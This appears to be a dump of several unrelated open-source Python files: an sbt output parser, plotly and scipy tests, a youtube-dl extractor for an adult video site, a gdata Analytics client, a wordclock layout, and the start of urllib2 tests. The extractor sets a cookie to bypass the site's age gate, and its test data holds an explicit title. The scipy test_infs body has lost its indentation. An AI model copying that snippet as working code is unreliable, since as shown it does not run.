    def _strip_terminal_codes(self, line):
        # Drop ANSI colour/erase sequences and the ESC-M reverse-index code.
        return re.sub(r'\033(?:M|\[[0-9;]+[mK])', '', line)
class OutputParser(object):
    """Base line parser: by default any further line ends the parse."""

    def parse(self, line):
        # Finish immediately; the implicit None return tells the monitor to
        # resume scanning for a new parser on the next line. finish() is
        # supplied by subclasses.
        self.finish()
class AbstractErrorParser(OutputParser):
    """Shared state/reporting for parsers that accumulate one error entry.

    Subclasses must set ``self.error_type`` and may append continuation
    lines via _extra_line() before finish() is called.
    """

    def __init__(self, project, line, filename, lineno, message):
        # `line` (the raw matched line) is accepted for uniformity with the
        # start() factories but is not stored.
        self.project = project
        self.reporter = project.error_reporter
        self.filename = filename
        self.lineno = lineno
        self.message = message
        self.extra_lines = []

    def finish(self):
        # Report the accumulated error. Returns None, which resets the
        # monitor back to scanning mode.
        self.reporter.error(self._error())

    def _extra_line(self, line):
        self.extra_lines.append(line)

    def _error(self):
        # Bundle everything into the project's SbtError value object.
        return SbtError(project=self.project,
                        filename=self.filename,
                        line=self.lineno,
                        message=self.message,
                        error_type=self.error_type,
                        extra_lines=self.extra_lines)
class ErrorParser(AbstractErrorParser):
    """Parses compiler diagnostics of the form
    ``[error|warn] path:line:(col:) message`` followed by continuation
    lines and a closing caret (``^``) line."""

    _HEAD_RE = re.compile(r'^\[(error|warn)\]\s+(.+?):(\d+):(?:(\d+):)?\s+(.+)$')
    _CARET_RE = re.compile(r'\[(?:error|warn)\] (\s*\^\s*)$')
    _BODY_RE = re.compile(r'\[(?:error|warn)\] (.*)$')

    @classmethod
    def start(cls, project, line):
        for head in maybe(cls._HEAD_RE.match(line)):
            yield cls(project,
                      line=line,
                      label=head.group(1),
                      filename=head.group(2),
                      lineno=int(head.group(3)),
                      message=head.group(5))

    def __init__(self, project, line, label, filename, lineno, message):
        AbstractErrorParser.__init__(self, project, line, filename, lineno, message)
        self.error_type = 'warning' if label == 'warn' else 'error'

    def parse(self, line):
        # The caret line closes the diagnostic; other [error]/[warn] lines
        # are continuations; anything else ends the parse.
        for caret in maybe(self._match_last_line(line)):
            self._extra_line(caret)
            return self.finish()
        for text in maybe(self._match_line(line)):
            self._extra_line(text)
            return self
        return self.finish()

    def _match_last_line(self, line):
        for found in maybe(self._CARET_RE.match(line)):
            return found.group(1)

    def _match_line(self, line):
        for found in maybe(self._BODY_RE.match(line)):
            return found.group(1)
class TestFailureParser(AbstractErrorParser):
    # Single line failures of the form:
    #   [error|info] message (filename:nn)
    _LINE_RE = re.compile(r'\[(?:error|info)\]\s+(.+)\s+\(([^:]+):(\d+)\)$')

    @classmethod
    def start(cls, project, line):
        for found in maybe(cls._LINE_RE.match(line)):
            yield cls(project,
                      line=line,
                      filename=found.group(2),
                      lineno=int(found.group(3)),
                      message=found.group(1))

    def __init__(self, project, line, filename, lineno, message):
        AbstractErrorParser.__init__(self, project, line, filename, lineno, message)
        self.error_type = 'failure'
class MultilineTestFailureParser(AbstractErrorParser):
    # Multi-line failures of the form:
    #   [info] - test description here *** FAILED ***
    #   [info] ...
    #   [info] ... (filename:nn)
    @classmethod
    def start(cls, project, line):
        for m in maybe(re.match(r'\[info\] - (.+) \*\*\* FAILED \*\*\*$', line)):
            yield cls(project,
                      line=line,
                      message=m.group(1))

    def __init__(self, project, line, message):
        # The file/line are not known until the closing "... (file:nn)" line,
        # so start with placeholders and fill them in from parse().
        AbstractErrorParser.__init__(self, project, line, "dummy", 0, message)
        self.error_type = 'error'

    def parse(self, line):
        for (t, filename, lineno) in maybe(self._match_last_line(line)):
            self._extra_line(t)
            self.filename = filename
            self.lineno = lineno
            return self.finish()
        for t in maybe(self._match_line(line)):
            self._extra_line(t)
            return self
        return self.finish()

    def _match_last_line(self, line):
        # Returns (text, filename, lineno) for the closing "... (file:nn)" line.
        for m in maybe(re.match(r'\[info\] (.+) \(([^:]+):(\d+)\)$', line)):
            return (m.group(1), m.group(2), int(m.group(3)))

    def _match_line(self, line):
        # Returns the text of an intermediate "[info] ..." continuation line.
        for m in maybe(re.match(r'\[info\] (.*)$', line)):
            return m.group(1)
class FinishedParser(OutputParser):
    """Recognizes the closing [success]/[error] "Total time:" line and
    notifies the reporter that the build has finished."""

    _TOTAL_RE = re.compile(r'\[(?:success|error)\] Total time:')

    @classmethod
    def start(cls, project, line):
        if cls._TOTAL_RE.match(line):
            yield cls(project)

    def __init__(self, project):
        self.reporter = project.error_reporter

    def finish(self):
        self.reporter.finish()
| mit |
plotly/plotly.py | packages/python/chart-studio/chart_studio/tests/test_plot_ly/test_api/test_v2/test_folders.py | 2 | 4118 | from __future__ import absolute_import
from chart_studio.api.v2 import folders
from chart_studio.tests.test_plot_ly.test_api import PlotlyApiTestCase
class FoldersTest(PlotlyApiTestCase):
    """Unit tests for the v2 `folders` API wrappers.

    The HTTP layer is mocked, so each test only verifies that a wrapper
    translates its arguments into the expected `requests.request` call.
    """

    def setUp(self):
        super(FoldersTest, self).setUp()

        # Mock the actual api call, we don't want to do network tests here.
        self.request_mock = self.mock("chart_studio.api.v2.utils.requests.request")
        self.request_mock.return_value = self.get_response()

        # Mock the validation function since we can test that elsewhere.
        self.mock("chart_studio.api.v2.utils.validate_response")

    def _last_request(self):
        """Returns (method, url, kwargs) of the single recorded request."""
        assert self.request_mock.call_count == 1
        (method, url), kwargs = self.request_mock.call_args
        return method, url, kwargs

    def test_create(self):
        path = "/foo/man/bar/"
        folders.create({"path": path})
        method, url, kwargs = self._last_request()
        self.assertEqual(method, "post")
        self.assertEqual(url, "{}/v2/folders".format(self.plotly_api_domain))
        self.assertEqual(kwargs["data"], '{{"path": "{}"}}'.format(path))

    def test_retrieve(self):
        folders.retrieve("hodor:88")
        method, url, kwargs = self._last_request()
        self.assertEqual(method, "get")
        self.assertEqual(url, "{}/v2/folders/hodor:88".format(self.plotly_api_domain))
        self.assertEqual(kwargs["params"], {})

    def test_retrieve_share_key(self):
        folders.retrieve("hodor:88", share_key="foobar")
        method, url, kwargs = self._last_request()
        self.assertEqual(method, "get")
        self.assertEqual(url, "{}/v2/folders/hodor:88".format(self.plotly_api_domain))
        self.assertEqual(kwargs["params"], {"share_key": "foobar"})

    def test_update(self):
        new_filename = "..zzZ ..zzZ"
        folders.update("hodor:88", body={"filename": new_filename})
        method, url, kwargs = self._last_request()
        self.assertEqual(method, "put")
        self.assertEqual(url, "{}/v2/folders/hodor:88".format(self.plotly_api_domain))
        self.assertEqual(kwargs["data"], '{{"filename": "{}"}}'.format(new_filename))

    def test_trash(self):
        folders.trash("hodor:88")
        method, url, _ = self._last_request()
        self.assertEqual(method, "post")
        self.assertEqual(
            url, "{}/v2/folders/hodor:88/trash".format(self.plotly_api_domain)
        )

    def test_restore(self):
        folders.restore("hodor:88")
        method, url, _ = self._last_request()
        self.assertEqual(method, "post")
        self.assertEqual(
            url, "{}/v2/folders/hodor:88/restore".format(self.plotly_api_domain)
        )

    def test_permanent_delete(self):
        folders.permanent_delete("hodor:88")
        method, url, _ = self._last_request()
        self.assertEqual(method, "delete")
        self.assertEqual(
            url,
            "{}/v2/folders/hodor:88/permanent_delete".format(self.plotly_api_domain),
        )

    def test_lookup(self):
        # requests does urlencode, so don't worry about the `' '` character!
        path = "/mah folder"
        parent = 43
        user = "someone"
        exists = True
        folders.lookup(path=path, parent=parent, user=user, exists=exists)
        method, url, kwargs = self._last_request()
        self.assertEqual(method, "get")
        self.assertEqual(url, "{}/v2/folders/lookup".format(self.plotly_api_domain))
        # `exists` is serialized to the lowercase string "true".
        self.assertEqual(
            kwargs["params"],
            {"path": path, "parent": parent, "exists": "true", "user": user},
        )
| mit |
pizzathief/scipy | scipy/special/tests/test_owens_t.py | 21 | 1323 | import numpy as np
from numpy.testing import assert_equal, assert_allclose
import scipy.special as sc
def test_symmetries():
    """Owen's T function is even in h and odd in a."""
    np.random.seed(1234)
    a_vals, h_vals = np.random.rand(100), np.random.rand(100)
    assert_equal(sc.owens_t(h_vals, a_vals), sc.owens_t(-h_vals, a_vals))
    assert_equal(sc.owens_t(h_vals, a_vals), -sc.owens_t(h_vals, -a_vals))
def test_special_cases():
    """Check known closed-form values of Owen's T."""
    # T(h, 0) is identically zero.
    assert_equal(sc.owens_t(5, 0), 0)
    # T(0, a) = arctan(a) / (2*pi).
    expected_zero_h = 0.5*np.arctan(5)/np.pi
    assert_allclose(sc.owens_t(0, 5), expected_zero_h, rtol=5e-14)
    # Target value is 0.5*Phi(5)*(1 - Phi(5)) for Phi the CDF of the
    # standard normal distribution.
    assert_allclose(sc.owens_t(5, 1), 1.4332574485503512543e-07, rtol=5e-14)
def test_nans():
    """A NaN in either argument propagates to the result."""
    nan = np.nan
    assert_equal(sc.owens_t(20, nan), nan)
    assert_equal(sc.owens_t(nan, 20), nan)
    assert_equal(sc.owens_t(nan, nan), nan)
def test_infs():
h = 1
res = 0.5*sc.erfc(h/np.sqrt(2))
assert_allclose(sc.owens_t(h, np.inf), res, rtol=5e-14)
assert_allclose(sc.owens_t(h, -np.inf), -res, rtol=5e-14)
assert_equal(sc.owens_t(np.inf, 1), 0)
assert_equal(sc.owens_t(-np.inf, 1), 0)
assert_equal(sc.owens_t(np.inf, np.inf), 0)
assert_equal(sc.owens_t(-np.inf, np.inf), 0)
assert_equal(sc.owens_t(np.inf, -np.inf), -0.0)
assert_equal(sc.owens_t(-np.inf, -np.inf), -0.0)
| bsd-3-clause |
donutmonger/youtube-dl | youtube_dl/extractor/extremetube.py | 102 | 2513 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_parse_qs,
compat_urllib_request,
)
from ..utils import (
qualities,
str_to_int,
)
class ExtremeTubeIE(InfoExtractor):
    # The pattern captures both the full site path (named group 'url', used
    # to rebuild a canonical http://www. URL) and the trailing numeric id.
    _VALID_URL = r'https?://(?:www\.)?(?P<url>extremetube\.com/.*?video/.+?(?P<id>[0-9]+))(?:[/?&]|$)'
    _TESTS = [{
        'url': 'http://www.extremetube.com/video/music-video-14-british-euro-brit-european-cumshots-swallow-652431',
        'md5': '344d0c6d50e2f16b06e49ca011d8ac69',
        'info_dict': {
            'id': '652431',
            'ext': 'mp4',
            'title': 'Music Video 14 british euro brit european cumshots swallow',
            'uploader': 'unknown',
            'view_count': int,
            'age_limit': 18,
        }
    }, {
        'url': 'http://www.extremetube.com/gay/video/abcde-1234',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        """Extract title, uploader, view count and formats for one video."""
        mobj = re.match(self._VALID_URL, url)
        video_id = mobj.group('id')
        # Normalise to the www. host regardless of how the URL was given.
        url = 'http://www.' + mobj.group('url')

        # The site's age gate is bypassed by presenting this cookie.
        req = compat_urllib_request.Request(url)
        req.add_header('Cookie', 'age_verified=1')
        webpage = self._download_webpage(req, video_id)

        video_title = self._html_search_regex(
            r'<h1 [^>]*?title="([^"]+)"[^>]*>', webpage, 'title')
        # Uploader and view count are best-effort (fatal=False): pages
        # without them still extract.
        uploader = self._html_search_regex(
            r'Uploaded by:\s*</strong>\s*(.+?)\s*</div>',
            webpage, 'uploader', fatal=False)
        view_count = str_to_int(self._html_search_regex(
            r'Views:\s*</strong>\s*<span>([\d,\.]+)</span>',
            webpage, 'view count', fatal=False))

        # Format URLs live in the flash player's "flashvars" param, encoded
        # as a query string with one quality_<res> key per available format.
        flash_vars = compat_parse_qs(self._search_regex(
            r'<param[^>]+?name="flashvars"[^>]+?value="([^"]+)"', webpage, 'flash vars'))

        formats = []
        quality = qualities(['180p', '240p', '360p', '480p', '720p', '1080p'])
        for k, vals in flash_vars.items():
            m = re.match(r'quality_(?P<quality>[0-9]+p)$', k)
            if m is not None:
                formats.append({
                    'format_id': m.group('quality'),
                    'quality': quality(m.group('quality')),
                    'url': vals[0],
                })
        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': video_title,
            'formats': formats,
            'uploader': uploader,
            'view_count': view_count,
            'age_limit': 18,
        }
| unlicense |
BeATz-UnKNoWN/python-for-android | python-build/python-libs/gdata/build/lib/gdata/analytics/service.py | 213 | 13293 | #!/usr/bin/python
#
# Copyright (C) 2006 Google Inc.
# Refactored in 2009 to work for Google Analytics by Sal Uryasev at Juice Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
AccountsService extends the GDataService to streamline Google Analytics
account information operations.
AnalyticsDataService: Provides methods to query google analytics data feeds.
Extends GDataService.
DataQuery: Queries a Google Analytics Data list feed.
AccountQuery: Queries a Google Analytics Account list feed.
"""
__author__ = 'api.suryasev (Sal Uryasev)'
import urllib
import atom
import gdata.service
import gdata.analytics
class AccountsService(gdata.service.GDataService):
  """Client extension for the Google Analytics Account List feed."""

  def __init__(self, email="", password=None, source=None,
               server='www.google.com/analytics', additional_headers=None,
               **kwargs):
    """Create a client for the Google Analytics service.

    Args:
      email: string (optional) User's email address, used for
          authentication.
      password: string (optional) User's password.
      source: string (optional) Name of the calling application.
      server: string (optional) Server to which a connection will be
          opened.
      **kwargs: Remaining parameters forwarded to the
          gdata.service.GDataService constructor.
    """
    gdata.service.GDataService.__init__(
        self, email=email, password=password, service='analytics',
        source=source, server=server, additional_headers=additional_headers,
        **kwargs)

  def QueryAccountListFeed(self, uri):
    """Fetch an AccountListFeed from the given URI.

    Args:
      uri: string URI of the feed being retrieved, possibly including
          query parameters (an AccountQuery can build these).

    Returns:
      An AccountListFeed object representing the feed the server returned.
    """
    return self.Get(uri, converter=gdata.analytics.AccountListFeedFromString)

  def GetAccountListEntry(self, uri):
    """Fetch a single AccountListEntry by its unique URI.

    Args:
      uri: string Unique URI of one entry in an account-list feed.

    Returns:
      An AccountListEntry object representing the retrieved entry.
    """
    return self.Get(uri, converter=gdata.analytics.AccountListEntryFromString)

  def GetAccountList(self, max_results=1000, text_query=None,
                     params=None, categories=None):
    """Fetch a feed containing all of the user's accounts and profiles."""
    query = gdata.analytics.service.AccountQuery(max_results=max_results,
                                                 text_query=text_query,
                                                 params=params,
                                                 categories=categories)
    return self.QueryAccountListFeed(query.ToUri())
class AnalyticsDataService(gdata.service.GDataService):
  """Client extension for the Google Analytics service Data List feed."""

  def __init__(self, email=None, password=None, source=None,
               server='www.google.com/analytics', additional_headers=None,
               **kwargs):
    """Creates a client for the Google Analytics service.

    Args:
      email: string (optional) The user's email address, used for
          authentication.
      password: string (optional) The user's password.
      source: string (optional) The name of the user's application.
      server: string (optional) The name of the server to which a connection
          will be opened.
      **kwargs: The other parameters to pass to gdata.service.GDataService
          constructor.
    """
    gdata.service.GDataService.__init__(self,
        email=email, password=password, service='analytics', source=source,
        server=server, additional_headers=additional_headers, **kwargs)

  def GetData(self, ids='', dimensions='', metrics='',
              sort='', filters='', start_date='',
              end_date='', start_index='',
              max_results=''):
    """Retrieves a feed containing a user's data

    ids: comma-separated string of analytics accounts.
    dimensions: comma-separated string of dimensions.
    metrics: comma-separated string of metrics.
    sort: comma-separated string of dimensions and metrics for sorting.
      This may be prefixed with a minus to sort in reverse order.
      (e.g. '-ga:keyword')
      If omitted, the first dimension passed in will be used.
    filters: comma-separated string of filter parameters.
      (e.g. 'ga:keyword==google')
    start_date: start date for data pull.
    end_date: end date for data pull.
    start_index: used in combination with max_results to pull more than 1000
      entries. This defaults to 1.
    max_results: maximum results that the pull will return.  This defaults
      to, and maxes out at 1000.
    """
    # Build the query object and delegate URI construction to it.
    q = gdata.analytics.service.DataQuery(ids=ids,
                                          dimensions=dimensions,
                                          metrics=metrics,
                                          filters=filters,
                                          sort=sort,
                                          start_date=start_date,
                                          end_date=end_date,
                                          start_index=start_index,
                                          max_results=max_results);
    return self.AnalyticsDataFeed(q.ToUri())

  def AnalyticsDataFeed(self, uri):
    """Retrieves an AnalyticsListFeed by retrieving a URI based off the
    Document List feed, including any query parameters. An
    AnalyticsListFeed object can be used to construct these parameters.

    Args:
      uri: string The URI of the feed being retrieved possibly with query
          parameters.

    Returns:
      An AnalyticsListFeed object representing the feed returned by the
          server.
    """
    return self.Get(uri,
                    converter=gdata.analytics.AnalyticsDataFeedFromString)

  """
  Account Fetching
  """

  def QueryAccountListFeed(self, uri):
    """Retrieves an Account ListFeed by retrieving a URI based off the Account
    List feed, including any query parameters. A AccountQuery object can
    be used to construct these parameters.

    Args:
      uri: string The URI of the feed being retrieved possibly with query
          parameters.

    Returns:
      An AccountListFeed object representing the feed returned by the server.
    """
    return self.Get(uri, converter=gdata.analytics.AccountListFeedFromString)

  def GetAccountListEntry(self, uri):
    """Retrieves a particular AccountListEntry by its unique URI.

    Args:
      uri: string The unique URI of an entry in an Account List feed.

    Returns:
      An AccountListEntry object representing the retrieved entry.
    """
    return self.Get(uri, converter=gdata.analytics.AccountListEntryFromString)

  def GetAccountList(self, username="default", max_results=1000,
                     start_index=1):
    """Retrieves a feed containing all of a user's accounts and profiles.

    The username parameter is soon to be deprecated, with 'default'
    becoming the only allowed parameter.
    """
    # An explicit falsy username is rejected rather than silently ignored.
    if not username:
      raise Exception("username is a required parameter")
    q = gdata.analytics.service.AccountQuery(username=username,
                                             max_results=max_results,
                                             start_index=start_index);
    return self.QueryAccountListFeed(q.ToUri())
class DataQuery(gdata.service.Query):
  """Builds the URI used to request a Google Analytics data feed."""

  def __init__(self, feed='/feeds/data', text_query=None,
               params=None, categories=None, ids="",
               dimensions="", metrics="", sort="", filters="",
               start_date="", end_date="", start_index="",
               max_results=""):
    """Constructor for an Analytics data-feed query.

    Args:
      feed: string (optional) Path of the feed (e.g. '/feeds/data').
      text_query: string (optional) Contents of the q query parameter;
          URL-escaped when the query is converted to a URI.
      params: dict (optional) Extra parameter/value pairs appended to the
          query string.
      categories: list (optional) Category strings to include as query
          categories (see gdata.service.Query).
      ids: comma-separated string of analytics accounts.
      dimensions: comma-separated string of dimensions.
      metrics: comma-separated string of metrics.
      sort: comma-separated string of dimensions and metrics to sort by; a
          leading minus sorts that field in reverse (e.g. '-ga:keyword').
          If omitted, the first dimension passed in is used.
      filters: comma-separated filter expression
          (e.g. 'ga:keyword==google').
      start_date: start date for the data pull.
      end_date: end date for the data pull.
      start_index: used with max_results to page past 1000 entries;
          defaults to 1.
      max_results: maximum entries the pull will return; defaults to, and
          maxes out at, 1000.
    """
    # Analytics-specific parameters; empty values are dropped in ToUri().
    self.elements = {'ids': ids,
                     'dimensions': dimensions,
                     'metrics': metrics,
                     'sort': sort,
                     'filters': filters,
                     'start-date': start_date,
                     'end-date': end_date,
                     'start-index': start_index,
                     'max-results': max_results}
    gdata.service.Query.__init__(self, feed, text_query, params, categories)

  def ToUri(self):
    """Return the URI for this query, including the analytics parameters."""
    saved_feed = self.feed
    # Temporarily fold the non-empty analytics parameters into the feed
    # path so the base class includes them in the generated URI.
    populated = dict((name, value) for name, value
                     in self.elements.iteritems() if value)
    self.feed = saved_feed + '?' + urllib.urlencode(populated)
    uri = gdata.service.Query.ToUri(self)
    self.feed = saved_feed
    return uri
class AccountQuery(gdata.service.Query):
  """Builds the URI used to query the Google Analytics account-list feed."""

  def __init__(self, feed='/feeds/accounts', start_index=1,
               max_results=1000, username='default', text_query=None,
               params=None, categories=None):
    """Constructor for an account-list query.

    Args:
      feed: string (optional) Path of the feed (e.g. '/feeds/accounts').
      start_index: int (optional) Index of the first entry to return;
          defaults to 1.
      max_results: int (optional) Maximum entries returned; defaults to,
          and maxes out at, 1000.
      username: string (deprecated) Should now always be 'default'.
      text_query: string (optional) Contents of the q query parameter;
          URL-escaped when the query is converted to a URI.
      params: dict (optional) Extra parameter/value pairs appended to the
          query string.
      categories: list (optional) Category strings to include as query
          categories (see gdata.service.Query).
    """
    self.max_results = max_results
    self.start_index = start_index
    self.username = username
    gdata.service.Query.__init__(self, feed, text_query, params, categories)

  def ToUri(self):
    """Return the URI for this query, including the paging parameters."""
    saved_feed = self.feed
    # The username is a path segment; paging goes into the query string.
    paging = '&'.join(['max-results=' + str(self.max_results),
                       'start-index=' + str(self.start_index)])
    self.feed = '/'.join([saved_feed, self.username]) + '?' + paging
    uri = self.feed
    self.feed = saved_feed
    return uri
| apache-2.0 |
elParaguayo/RPi-InfoScreen-Kivy | screens/wordclock/layouts/spanish.py | 2 | 3577 | '''This is a custom layout for the RPi InfoScreen wordclock screen.
Custom layouts can be created for the screen by creating a new file in the
"layouts" folder.
Each layout must have the following variables:
LAYOUT: The grid layout. Must be a single string.
MAP: The mapping required for various times (see notes below)
COLS: The number of columns required for the grid layout
SIZE: The size of the individual box containing your letter.
Tuple in (x, y) format.
FONTSIZE: Font size for the letter
'''
# Layout is a single string variable which will be looped over by the parser.
# 8 rows x 15 columns = 120 letters; cell index = row * 15 + column.
LAYOUT = ("ESONPLASWUNADOS"  # row 0 (0-14): ES/SON, LA/LAS, UNA, DOS
          "TRESCUATROCINCO"  # row 1 (15-29): TRES, CUATRO, CINCO
          "SEISIETEOCHONCE"  # row 2 (30-44): SEIS/SIETE (shared S), OCHO, ONCE
          "NUEVESDIEZVDOCE"  # row 3 (45-59): NUEVE, DIEZ, DOCE
          "YMENOSQCINCORPI"  # row 4 (60-74): Y, MENOS, CINCO
          "DIEZTRCUARTOELP"  # row 5 (75-89): DIEZ, CUARTO
          "VEINTEBMEDIALZI"  # row 6 (90-104): VEINTE, MEDIA
          "RPIVEINTICINCOR"  # row 7 (105-119): VEINTICINCO
          )
# Map instructions:
# The clock works by rounding the time to the nearest 5 minutes.
# This means that you need to have settings for each five minute interval "m00"
# "m00", "m05".
# The clock also works on a 12 hour basis rather than 24 hour:
# "h00", "h01" etc.
# There are three optional parameters:
# "all": Anything that is always shown regardless of the time e.g. "It is..."
# "am": Wording/symbol to indicate morning.
# "pm": Wording/symbol to indicate afternoon/evening
# NOTE: the original literal defined every "mXX" key twice with identical
# values; duplicate dict keys are silently overwritten, so the redundant
# second set has been removed.
MAP = {
    # Letters that are always lit (none for this layout).
    "all": [],
    # Minutes, rounded to the nearest five. 60 = "Y", 61-65 = "MENOS".
    "m00": [],
    "m05": [60, 67, 68, 69, 70, 71],                                     # Y CINCO
    "m10": [60, 75, 76, 77, 78],                                         # Y DIEZ
    "m15": [60, 81, 82, 83, 84, 85, 86],                                 # Y CUARTO
    "m20": [60, 90, 91, 92, 93, 94, 95],                                 # Y VEINTE
    "m25": [60, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118],  # Y VEINTICINCO
    "m30": [60, 97, 98, 99, 100, 101],                                   # Y MEDIA
    "m35": [61, 62, 63, 64, 65, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118],
    "m40": [61, 62, 63, 64, 65, 90, 91, 92, 93, 94, 95],                 # MENOS VEINTE
    "m45": [61, 62, 63, 64, 65, 81, 82, 83, 84, 85, 86],                 # MENOS CUARTO
    "m50": [61, 62, 63, 64, 65, 75, 76, 77, 78],                         # MENOS DIEZ
    "m55": [61, 62, 63, 64, 65, 67, 68, 69, 70, 71],                     # MENOS CINCO
    # Hours (12-hour clock): "ES LA UNA" for one, "SON LAS <hora>" otherwise.
    "h01": [0, 1, 5, 6, 9, 10, 11],
    "h02": [1, 2, 3, 5, 6, 7, 12, 13, 14],
    "h03": [1, 2, 3, 5, 6, 7, 15, 16, 17, 18],
    "h04": [1, 2, 3, 5, 6, 7, 19, 20, 21, 22, 23, 24],
    "h05": [1, 2, 3, 5, 6, 7, 25, 26, 27, 28, 29],
    "h06": [1, 2, 3, 5, 6, 7, 30, 31, 32, 33],
    "h07": [1, 2, 3, 5, 6, 7, 33, 34, 35, 36, 37],
    "h08": [1, 2, 3, 5, 6, 7, 38, 39, 40, 41],
    "h09": [1, 2, 3, 5, 6, 7, 45, 46, 47, 48, 49],
    "h10": [1, 2, 3, 5, 6, 7, 51, 52, 53, 54],
    "h11": [1, 2, 3, 5, 6, 7, 41, 42, 43, 44],
    "h12": [1, 2, 3, 5, 6, 7, 56, 57, 58, 59],
    # No am/pm indicator letters in this layout.
    "am": [],
    "pm": []
}
# Number of columns in grid layout
COLS = 15
# Size of the individual box containing one letter, as (x, y) —
# presumably pixels; confirm against the screen's rendering code.
SIZE = (53, 60)
# Font size of letter
FONTSIZE = 40
# Is our language one where we need to increment the hour after 30 mins
# e.g. 9:40 is "Twenty to ten"
HOUR_INCREMENT = True
# Minutes past the hour after which the displayed hour is advanced.
HOUR_INCREMENT_TIME = 30
| gpl-3.0 |
kerr-huang/SL4A | python/src/Lib/test/test_urllib2.py | 48 | 45551 | import unittest
from test import test_support
import os
import socket
import StringIO
import urllib2
from urllib2 import Request, OpenerDirector
# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler
class TrivialTests(unittest.TestCase):
    def test_trivial(self):
        # A couple trivial tests

        # An unparseable URL must raise ValueError immediately.
        self.assertRaises(ValueError, urllib2.urlopen, 'bogus url')

        # XXX Name hacking to get this to work on Windows.
        fname = os.path.abspath(urllib2.__file__).replace('\\', '/')
        if fname[1:2] == ":":
            fname = fname[2:]
        # And more hacking to get it to work on MacOS. This assumes
        # urllib.pathname2url works, unfortunately...
        if os.name == 'mac':
            fname = '/' + fname.replace(':', '/')
        elif os.name == 'riscos':
            import string
            fname = os.expand(fname)
            fname = fname.translate(string.maketrans("/.", "./"))

        # A file:// URL pointing at urllib2's own source must open and read.
        file_url = "file://%s" % fname
        f = urllib2.urlopen(file_url)

        buf = f.read()
        f.close()

    def test_parse_http_list(self):
        # Comma-separated HTTP header lists, including quoted elements with
        # embedded commas and escaped quotes/backslashes.
        # NOTE(review): the loop variables shadow the builtins `list` and the
        # `string` module name; harmless here but worth knowing.
        tests = [('a,b,c', ['a', 'b', 'c']),
                 ('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
                 ('a, b, "c", "d", "e,f", g, h', ['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
                 ('a="b\\"c", d="e\\,f", g="h\\\\i"', ['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
        for string, list in tests:
            self.assertEquals(urllib2.parse_http_list(string), list)
def test_request_headers_dict():
    # NOTE(review): this docstring is an executable doctest; do not edit
    # the >>> examples or their expected output casually.
    """
    The Request.headers dictionary is not a documented interface.  It should
    stay that way, because the complete set of headers are only accessible
    through the .get_header(), .has_header(), .header_items() interface.
    However, .headers pre-dates those methods, and so real code will be using
    the dictionary.

    The introduction in 2.4 of those methods was a mistake for the same reason:
    code that previously saw all (urllib2 user)-provided headers in .headers
    now sees only a subset (and the function interface is ugly and incomplete).

    A better change would have been to replace .headers dict with a dict
    subclass (or UserDict.DictMixin instance?)  that preserved the .headers
    interface and also provided access to the "unredirected" headers.  It's
    probably too late to fix that, though.

    Check .capitalize() case normalization:

    >>> url = "http://example.com"
    >>> Request(url, headers={"Spam-eggs": "blah"}).headers["Spam-eggs"]
    'blah'
    >>> Request(url, headers={"spam-EggS": "blah"}).headers["Spam-eggs"]
    'blah'

    Currently, Request(url, "Spam-eggs").headers["Spam-Eggs"] raises KeyError,
    but that could be changed in future.

    """
def test_request_headers_methods():
    # NOTE(review): this docstring is an executable doctest; do not edit
    # the >>> examples or their expected output casually.
    """
    Note the case normalization of header names here, to .capitalize()-case.
    This should be preserved for backwards-compatibility.  (In the HTTP case,
    normalization to .title()-case is done by urllib2 before sending headers to
    httplib).

    >>> url = "http://example.com"
    >>> r = Request(url, headers={"Spam-eggs": "blah"})
    >>> r.has_header("Spam-eggs")
    True
    >>> r.header_items()
    [('Spam-eggs', 'blah')]
    >>> r.add_header("Foo-Bar", "baz")
    >>> items = r.header_items()
    >>> items.sort()
    >>> items
    [('Foo-bar', 'baz'), ('Spam-eggs', 'blah')]

    Note that e.g. r.has_header("spam-EggS") is currently False, and
    r.get_header("spam-EggS") returns None, but that could be changed in
    future.

    >>> r.has_header("Not-there")
    False
    >>> print r.get_header("Not-there")
    None
    >>> r.get_header("Not-there", "default")
    'default'

    """
def test_password_manager(self):
    # NOTE(review): module-level function with an unused `self` parameter —
    # presumably a historical artifact; the body is an executable doctest,
    # so do not edit the >>> examples or their expected output casually.
    """
    >>> mgr = urllib2.HTTPPasswordMgr()
    >>> add = mgr.add_password
    >>> add("Some Realm", "http://example.com/", "joe", "password")
    >>> add("Some Realm", "http://example.com/ni", "ni", "ni")
    >>> add("c", "http://example.com/foo", "foo", "ni")
    >>> add("c", "http://example.com/bar", "bar", "nini")
    >>> add("b", "http://example.com/", "first", "blah")
    >>> add("b", "http://example.com/", "second", "spam")
    >>> add("a", "http://example.com", "1", "a")
    >>> add("Some Realm", "http://c.example.com:3128", "3", "c")
    >>> add("Some Realm", "d.example.com", "4", "d")
    >>> add("Some Realm", "e.example.com:3128", "5", "e")

    >>> mgr.find_user_password("Some Realm", "example.com")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/spam")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/spam/spam")
    ('joe', 'password')
    >>> mgr.find_user_password("c", "http://example.com/foo")
    ('foo', 'ni')
    >>> mgr.find_user_password("c", "http://example.com/bar")
    ('bar', 'nini')

    Actually, this is really undefined ATM
    ## Currently, we use the highest-level path where more than one match:

    ## >>> mgr.find_user_password("Some Realm", "http://example.com/ni")
    ## ('joe', 'password')

    Use latest add_password() in case of conflict:

    >>> mgr.find_user_password("b", "http://example.com/")
    ('second', 'spam')

